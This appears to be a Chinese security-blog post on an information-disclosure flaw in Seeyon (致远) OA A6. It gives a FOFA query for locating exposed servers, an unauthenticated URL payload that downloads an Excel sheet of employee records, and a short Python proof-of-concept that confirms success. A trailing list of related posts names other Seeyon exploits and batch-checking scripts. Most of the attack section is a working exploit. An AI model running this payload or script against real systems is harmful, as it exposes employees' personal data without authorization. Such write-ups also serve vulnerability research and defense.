致远OA A6 员工敏感信息泄露

1.漏洞描述

seeyon OA A6版本存在敏感信息泄露漏洞,攻击者可构造payload,获取敏感信息。

2.复现过程

fofa:app=“致远A6”

payload:/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
浏览器访问https://IP:PORT/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0

获取到员工信息excel表。

3.POC

import requeststarget = "http://IP:PORT"
url = target + "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0"
res = requests.get(url, verify=False)
if res.status_code == 200 and b"[Content_Types].xml" in res.content and b"Excel.Sheet" in res.content:print("success")
else:print("no vulnerability")

4.refer

https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md

致远OA A6 员工敏感信息泄露相关推荐

  1. 致远OA文件上传漏洞(含批量检测POC)

    文章目录 文件上传 wpsAssistServlet 任意文件上传 漏洞描述 漏洞影响 网络测绘 批量检测POC ajax.do 任意文件上传 CNVD-2021-01627漏洞 漏洞描述 漏洞影响 ...

  2. 致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现

    为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 漏洞描述 02 影响范围 03 利用方式 04 修复方案 01 漏洞描述 致远OA是一套办公协同管理软件.致远OA wpsAssistServ ...

  3. 致远OA敏感信息泄露漏洞合集(含批量检测POC)

    文章目录 前言 敏感信息泄露 A6 status.jsp 信息泄露漏洞 漏洞描述 漏洞影响 网络测绘 漏洞复现 POC 批量检测 getSessionList.jsp Session泄漏漏洞 漏洞描述 ...

  4. 致远OA V8.2 A8 A6 G6N 企业,事业,政府行政协同办公系统

    致远OA V8.2 A8 A6 G6N 企业,事业,政府行政协同办公系统

  5. 郑州万向置业oa服务器信息,[办公OA]-致远OA控件安装说明

    在使用OA之前,需要在浏览器中安装必要的插件(如Office控件),以方便OA系统提供更好地编辑和使用功能.插件的安装包括两大步骤,一是对浏览器进行设置,二是OA控件的安装.下面是详细步骤,请大家参照 ...

  6. 致远OA任意文件下载漏洞(CNVD-2020-62422)

    文章目录 漏洞描述 影响版本 payload poc 漏洞复现 修复补丁 漏洞描述 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 影响版本 致远OA A6-V5 致远OA ...

  7. 致远oa服务器端口怎么修改,致远oa服务器设置

    致远oa服务器设置 内容精选 换一换 云耀云服务器创建成功后,您可以根据需求,修改云服务器的名称.系统支持批量修改多台云耀云服务器的名称,修改完成后,这些云耀云服务器的名称相同.登录控制台.单击管理控 ...

  8. 致远OA管理员密码的重置

    管理员账号忘记了,然后致远OA的运维服务也到期了,怎么办? 求人不如求自己,我们来看看到底怎么修改相关的管理员密码吧. 注意一:更新后需要重启OA应用方可生效. 注意二:更新后的密码是OA系统预设密码 ...

  9. 浅谈“敏感信息泄露“

    一:漏洞名称: 敏感信息泄露 描述: 敏感数据包括但不限于:口令.密钥.证书.会话标识.License.隐私数据(如短消息的内容).授权凭据.个人数据(如姓名.住址.电话等)等,在程序文件.配置文件. ...

  10. 致远OA ajax.do 任意文件上传 (CNVD-2021-01627) 漏洞复现

    为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 漏洞描述 02 影响范围 03 验证方式 04 利用方式 05 修复方案 01 漏洞描述 致远OA是一套办公协同管理软件.由于致远OA旧版本某 ...

最新文章

  1. 二十年后我发明了保姆机器人作文_我想发明保姆机器人作文700字
  2. python中itemgetter函数_Python中的sorted函数以及operator.itemgetter函数
  3. 随机信号通过带通滤波器
  4. java中数组属于哪种类型_在Java中,关于数组描述正确的是
  5. 刷新DNS解析缓存+追踪+域名解析命令
  6. linux-pcap 抓包程序框架
  7. blood vessel 图像分割_单图像九宫格形式发送朋友圈
  8. VS Code 调试 Angular 和 TypeScript 的配置
  9. 计算机408真题_2019年计算机统考408真题第8题及其解析
  10. 卡尔曼滤波 KF | 扩展卡尔曼滤波 EKF (思路流程和计算公式)
  11. 20165232 结对编程第二周总结
  12. 化工原理计算机辅助设计,化工原理课程设计心得体会
  13. c语言博物馆文物管理系统,博物馆文物智能管理系统.docx
  14. 提取Windows主题中的图片
  15. java 将对象写入链表_在Java中,_____类可用于创建链表数据结构的对象。
  16. C语言BCC异或效验
  17. Gogs生产环境搭建和数据迁移指南
  18. tf.saved_model.save报错解决
  19. 二叉树剪枝_二叉树遍历与剪枝
  20. h5滚动时侧滑出现_HTML5移动端触摸事件以及滑动翻页效果

热门文章

  1. 网页游戏外挂的设计与编写:QQ摩天大楼【二】(登陆准备-信息处理方式)
  2. html中的em的使用方法,css布局的em的使用方法
  3. bat脚本_更改文件夹访问权限
  4. 暑假教师计算机培训总结,教师信息化培训心得(精选5篇)
  5. 大一上:计算机导论复习(每章分值、常考题型以及部分章节课后习题答案【网上没有,老师自己做的】)
  6. Protobuf协议格式详解
  7. glassfish mysql datasource_GlassFish连接池(GlassFish connection pool)
  8. 宽带光纤接入网的概念和典型应用类型
  9. 计算机音乐按键有声音,计算器上的声音键是哪个键
  10. 【转】如何使html5语义化标签兼容ie